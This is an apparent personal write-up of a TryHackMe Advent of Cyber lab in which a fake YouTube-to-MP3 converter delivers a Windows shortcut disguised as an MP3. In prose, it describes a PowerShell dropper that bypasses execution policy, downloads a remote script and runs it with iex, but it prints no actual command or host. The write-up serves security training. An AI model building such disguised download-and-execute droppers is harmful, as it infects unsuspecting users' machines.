TryHackMe Advent of Cyber 2024 Day 1 Write-Up

Published on 2024-12-15

Category: Misc

Welcome to my write-up for Day 1 of TryHackMe’s Advent of Cyber 2024! Today, we kick things off by exploring a suspicious host provided in our virtual machine (VM) and attackbox environment. At first glance, it appears to be a simple YouTube-to-MP3 converter. However, these types of sites—especially in the early 2010s—were notorious for bundling malware, phishing scams, or malvertising. I actually fell victim to one of these when I was about 10 years old, just trying to download free music onto my budget MP3 player.

Since we’re in a VM, it’s safe to test out the converter. Let’s try converting and downloading a file.

YouTube-to-MP3 converter screenshot

I pasted in a YouTube video—Rollin' by Limp Bizkit, which, funnily enough, might have been the exact song I tried to download when I was 10. The converter then prompted me to download a suspicious ZIP file, supposedly containing our newly converted MP3.

Downloading the suspicious file screenshot

Sure enough, after extraction, we end up with two files: somg.mp3 and song.mp3.

The extracted files

Next, I opened a terminal and used the file command to see if anything stood out.

Using the file command on the suspicious files

The output reveals that song.mp3 is likely a legitimate audio file, while somg.mp3 is actually a Windows shortcut. Let’s dig deeper with ExifTool to gather more metadata.

ExifTool analysis screenshot

We can see this file tries to run a PowerShell command with -ep bypass -nop flags, disabling PowerShell restrictions. It then uses DownloadFile to grab a remote script and save it in C:\ProgramData\. After downloading, it executes s.ps1 via the iex command (Invoke-Expression). This is a classic tactic for fetching and running malicious payloads.

Curious about what that script contains, we open the link in a web browser and find a PowerShell script specifically designed to:

Contents of the malicious PowerShell script

In the script, we notice a comment stating: “Created by the one and only M.M.” A quick GitHub search for this string leads us to a repository issue discussing this exact script and tying it to a GitHub account. This is a solid lead, and we might uncover the attacker’s full identity in upcoming Advent of Cyber challenges.

GitHub repository issue screenshot
Second GitHub repository issue screenshot

Conclusion

The Day 1 challenge highlights how easy it can be to disguise malware as a simple YouTube-to-MP3 converter. If you’re using sites like this outside of a VM or sandbox, proceed with caution. Hopefully, as Advent of Cyber continues, we’ll learn more about “M.M.” and their operation.

Thanks for reading!